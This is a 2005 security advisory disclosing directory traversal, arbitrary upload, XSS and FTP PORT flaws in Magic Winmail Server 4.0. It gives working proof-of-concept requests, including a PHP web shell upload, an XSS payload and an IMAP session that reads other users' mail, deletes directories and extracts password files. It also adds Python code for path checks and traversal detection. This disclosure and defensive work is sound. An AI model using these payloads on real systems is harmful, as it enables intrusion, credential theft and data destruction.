by Tan Chew Keong
Release Date: 27 Jan 2005
Magic Winmail Server is an enterprise-class mail server software system offering a robust feature set, including extensive security measures. Winmail Server supports SMTP, POP3, IMAP, Webmail, LDAP, multiple domains, SMTP authentication, spam protection, anti-virus protection, SSL/TLS security, network storage, remote access, web-based administration, and a wide array of standard email options such as filtering, signatures, real-time monitoring, archiving, and public email folders.
Multiple vulnerabilities were found in Magic Winmail Server's Webmail service, IMAP service and FTP service.
Winmail Server's PHP-based Webmail has vulnerabilities that may be exploited to download arbitrary files from the server, to upload files
to arbitrary directories, and to conduct Cross-Site Scripting (XSS) attacks. A directory traversal vulnerability in
Winmail Server's IMAP service gives a malicious user the ability to read arbitrary users' emails,
create/delete arbitrary directories on the server, and/or retrieve arbitrary files from the server. In addition,
Winmail Server's FTP service does not validate the IP address supplied in a PORT command. This may be exploited to perform
a port scan from the FTP server.
Tested systems: Magic Winmail Server Version 4.0 Build 1112 on English Win2K SP4 and WinXP SP2.
Multiple vulnerabilities were found in Magic Winmail Server Version 4.0 (Build 1112)'s Webmail, IMAP and FTP services.
1. Webmail Vulnerabilities
Winmail Server has a Webmail interface that allows the user to read/send emails using his/her browser. This Webmail
interface is implemented using PHP scripts and runs on the Apache/PHP server that is bundled with the installation
package. The default installation runs Apache/PHP as a Windows Service with LOCAL SYSTEM privilege. Vulnerabilities in
the PHP scripts allow arbitrary file download, file upload to arbitrary directories, and XSS.
a. download.php directory traversal allows arbitrary file download
The download.php script allows a user to download his/her email file attachments. Lack of input parameter sanitization
allows a logged-on mail user to retrieve arbitrary files from the server by supplying specially crafted input parameters to
download.php. The following two requests will retrieve userauth.cfg, which contains users' MD5 password hashes.
Each of the two requests takes a different code path through download.php to download the file.
http://[hostname]:6080/download.php?
sid=656041e927559a2ff& // this must be the current session id
tid=0&folder=INBOX&ix=0&part=1&optype=download&type=nonmime&filename=Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw==
// Note Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw== is the base64 encoding of /../../../../userauth.cfg
http://[hostname]:6080/download.php?
sid=656041e927559a2ff&
tid=0&folder=INBOX&ix=0&part=1&optype=download&cache=1&filename=/../../../../userauth.cfg
b. upload.php directory traversal allows file upload to arbitrary directories
The upload.php script allows a mail user to upload his/her email file attachment when composing an email. Lack of
input sanitization of the supplied filename allows a logged-on mail user to upload files to arbitrary locations on the
server. This may be exploited to upload arbitrary PHP scripts into the webmail directory as shown below. Successful
exploitation on the default installation of Winmail Server will allow execution of arbitrary PHP scripts with LOCAL
SYSTEM privilege. The full HTTP request can be viewed here.
-----------------------------31140333525651
Content-Disposition: form-data; name="userfile1"; filename="/../../../a.php"
Content-Type: application/download
<?php
system($_GET[cmd]);
?>
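A server-side check that covers both download.php code paths (base64-encoded filename with type=nonmime, plain filename with cache=1) and the upload.php filename, written as an added Python example rather than as Winmail's PHP; it is not the vendor's code, and the attachment directory ATTACH_ROOT is an assumption:

```python
import base64
import binascii
import posixpath
from urllib.parse import parse_qs

# Assumed attachment directory for the demo; not a path from the advisory.
ATTACH_ROOT = "/var/winmail/webmail/attach"


def decode_filename(filename, nonmime):
    """Mirror download.php's two code paths: with type=nonmime the filename
    parameter is base64-encoded, with cache=1 it is a plain path."""
    if not nonmime:
        return filename
    try:
        return base64.b64decode(filename, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        raise ValueError("filename is not valid base64")


def safe_attachment_path(root, filename, nonmime=False):
    """Return the absolute path of the requested file inside root, or None
    when the decoded name would resolve outside root. Decoding happens
    before normalisation, so the base64 and plain variants are treated
    alike; the same check applies to the upload.php filename."""
    name = decode_filename(filename, nonmime)
    if "\x00" in name:                 # NUL truncates paths in C runtimes
        return None
    name = name.replace("\\", "/")     # Windows server: fold both separators
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, name))
    if candidate == root or not candidate.startswith(root + "/"):
        return None                    # escaped the directory (or named it)
    return candidate


def check_download_request(query):
    """Apply the check to a raw download.php query string."""
    params = {k: v[0] for k, v in parse_qs(query).items()}
    nonmime = params.get("type") == "nonmime"
    return safe_attachment_path(ATTACH_ROOT, params.get("filename", ""), nonmime)
```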
c. XSS vulnerability in Webmail Web Administration when displaying mail users' personal info
The /admin/user.php script allows the Webmail administrator to view webmail users' username, full name, description,
and company name. A malicious user may enter JavaScript in his own personal info using
userinfo.php. Due to lack of filtering of HTML special characters, this JavaScript will
execute in the Webmail administrator's browser when the administrator accesses the /admin/user.php
script. Such scripts may be crafted to steal the administrator's session cookie, etc.
For example, the user may set his description to <script>alert(document.form1.sid.value);</script>
2. IMAP Service Directory Traversal Vulnerability
A directory traversal vulnerability was found in several of Winmail Server's IMAP commands.
These vulnerable commands may be exploited by a malicious logged-on user to read arbitrary users' emails,
create/delete arbitrary directories on the server, and/or retrieve arbitrary files from the server.
IMAP commands such as CREATE, EXAMINE, SELECT and DELETE are affected by this vulnerability.
The following transcript of an IMAP session illustrates this.
[c:\]nc X.X.X.X 143
* OK IMAP4 ready! localhost Winmail Mail Server MagicWinmail Extend IMAP 101
1 LOGIN "test" "password" // login as user test
1 OK LOGIN OK.
2 SELECT "../test2/INBOX" // selected user test2's mailbox
* FLAGS (\Answered \Deleted \Draft \Seen \Recent)
* OK [PERMANENTFLAGS (\Answered \Draft \Flagged \Seen)]
* 1 EXISTS
* 0 RECENT
* OK [UNSEEN 1] Message 1 is unseen.
* OK [UIDNEXT 2] Predicted valid
* OK [UIDVALIDITY 1105791403] UIDs valid
2 OK [READ-WRITE] OK SELECT completed.
3 UID fetch 1:1 (UID RFC822.SIZE FLAGS BODY.PEEK[]) // retrieve test2's mail
* 1 FETCH (UID 1 FLAGS () RFC822.SIZE 271 BODY[] {422}
Return-Path:
Delivered-To: test2@xxx.xx
Received: (winmail server invoked for smtp delivery); Sat, 15 Jan 2005 20:16:18 +0800
Received: (winmail server invoked for report); Sat, 15 Jan 2005 20:16:18 +0800
From: postmaster@xxx.xx
To: test2@xxx.xx
Date: Sat, 15 Jan 2005 20:16:18 +0800
Subject: welcome
Hi, test2
Welcome to use the mail system!
Your mail address is test2@xxx.xx.
.
)
3 OK FETCH completed.
4 CREATE "../../../../../../../../hacked" // create directory in root dir
4 OK "../../../../../../../../hacked" created.
5 DELETE "../../../../../../../../data" // delete "data" directory in root dir
5 OK DELETE completed.
6 SELECT "../../../server" // this will corrupt all filenames in \installdir\server!!
* FLAGS (\Answered \Deleted \Draft \Seen \Recent)
* OK [PERMANENTFLAGS (\Answered \Draft \Flagged \Seen)]
* 11 EXISTS
* 11 RECENT
* OK [UNSEEN 11] Message 11 is unseen.
* OK [UIDNEXT 23] Predicted valid
* OK [UIDVALIDITY 1105793353] UIDs valid
6 OK [READ-WRITE] OK SELECT completed.
7 UID fetch 21 (UID RFC822.SIZE FLAGS BODY.PEEK[]) // stealing userauth.cfg
* 10 FETCH (UID 21 FLAGS (\Recent ) RFC822.SIZE 3933 BODY[] {3933}
<database>
<user>
<item>
<name>postmaster</name>
<domain></domain>
<password>password</password>
<fullname>postmaster</fullname>
<description></description>
[snipped]
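A detector for the traversal pattern in the session above, added here and not part of the original advisory: it scans the client side of an IMAP session transcript (the sample below is constructed from the session above) and flags CREATE, EXAMINE, SELECT and DELETE commands whose mailbox argument resolves outside the user's mailbox root. The pseudo-root /mbox is an assumption.

```python
import posixpath
import re

# Commands the advisory names as affected by the traversal.
MAILBOX_COMMANDS = {"CREATE", "EXAMINE", "SELECT", "DELETE"}

# tag, command word, then one quoted or bare argument (the mailbox name)
CMD_RE = re.compile(r'^(?P<tag>\S+)\s+(?P<cmd>[A-Za-z]+)\s+(?:"(?P<q>[^"]*)"|(?P<bare>\S+))')

# Constructed from the session above; text after " //" is a transcript note.
SAMPLE_SESSION = """\
1 LOGIN "test" "password"
1 OK LOGIN OK.
2 SELECT "../test2/INBOX" // user test2's mailbox
2 OK [READ-WRITE] OK SELECT completed.
3 UID fetch 1:1 (UID RFC822.SIZE FLAGS BODY.PEEK[])
4 CREATE "../../../../../../../../hacked"
4 OK "../../../../../../../../hacked" created.
5 DELETE "../../../../../../../../data"
6 SELECT "../../../server"
7 SELECT INBOX
8 EXAMINE "Sent Items"
"""


def mailbox_escapes_root(mailbox):
    """True when the mailbox name, resolved relative to the user's mailbox
    root (assumed here to be /mbox), would point outside it. Backslashes
    are folded to '/' because the server runs on Windows."""
    name = mailbox.replace("\\", "/")
    resolved = posixpath.normpath(posixpath.join("/mbox", name))
    return not (resolved == "/mbox" or resolved.startswith("/mbox/"))


def find_traversal(transcript):
    """Return (tag, command, mailbox) for every affected client command in
    the transcript whose mailbox argument escapes the root. Server replies
    ('* ...' or 'tag OK ...') never carry an affected command word."""
    hits = []
    for line in transcript.splitlines():
        m = CMD_RE.match(line.split(" //")[0].strip())
        if not m or m.group("cmd").upper() not in MAILBOX_COMMANDS:
            continue
        mailbox = m.group("q") if m.group("q") is not None else m.group("bare")
        if mailbox_escapes_root(mailbox):
            hits.append((m.group("tag"), m.group("cmd").upper(), mailbox))
    return hits
```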
3. FTP Service PORT Command Vulnerability
Winmail Server's FTP service does not validate the IP address supplied in a PORT command. It is possible to issue the
PORT command with an IP address that is different from the logged-on user's IP address. This may be exploited to perform
a port scan from the FTP server.
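The missing validation, as an added Python example (not Winmail's code): parse the PORT argument and refuse data connections whose address differs from the control connection's peer or whose port is privileged, which is the mitigation RFC 2577 describes for FTP bounce scanning.

```python
import ipaddress


def parse_port_command(arg):
    """Parse a PORT argument of the form h1,h2,h3,h4,p1,p2 into an
    IPv4Address and a port number; malformed input raises ValueError."""
    parts = arg.split(",")
    if len(parts) != 6:
        raise ValueError("PORT needs six comma-separated numbers")
    nums = [int(p) for p in parts]
    if any(n < 0 or n > 255 for n in nums):
        raise ValueError("each PORT field must be in 0..255")
    host = ipaddress.IPv4Address(".".join(str(n) for n in nums[:4]))
    return host, nums[4] * 256 + nums[5]


def port_command_allowed(arg, control_peer_ip, min_port=1024):
    """Return (allowed, reason). The data-connection target must be the
    address the client's control connection came from, and must not be a
    privileged port; together these stop the server being used as a
    port-scanning relay (RFC 2577)."""
    try:
        host, port = parse_port_command(arg)
        peer = ipaddress.IPv4Address(control_peer_ip)
    except ValueError as exc:
        return False, "malformed PORT: %s" % exc
    if host != peer:
        return False, "PORT address %s differs from control peer %s" % (host, peer)
    if port < min_port:
        return False, "PORT to privileged port %d refused" % port
    return True, "ok"
```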
Patch: upgrade to version 4.0 (Build 1318).
Disclosure timeline:
15 Jan 05 - Vulnerability Discovered.
16 Jan 05 - Initial Vendor Notification by Email and Web Form.
16 Jan 05 - Initial Vendor Reply.
27 Jan 05 - Received Email from Vendor that a Fixed Version was Released.
27 Jan 05 - Public Release.
For further questions and enquiries, email the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg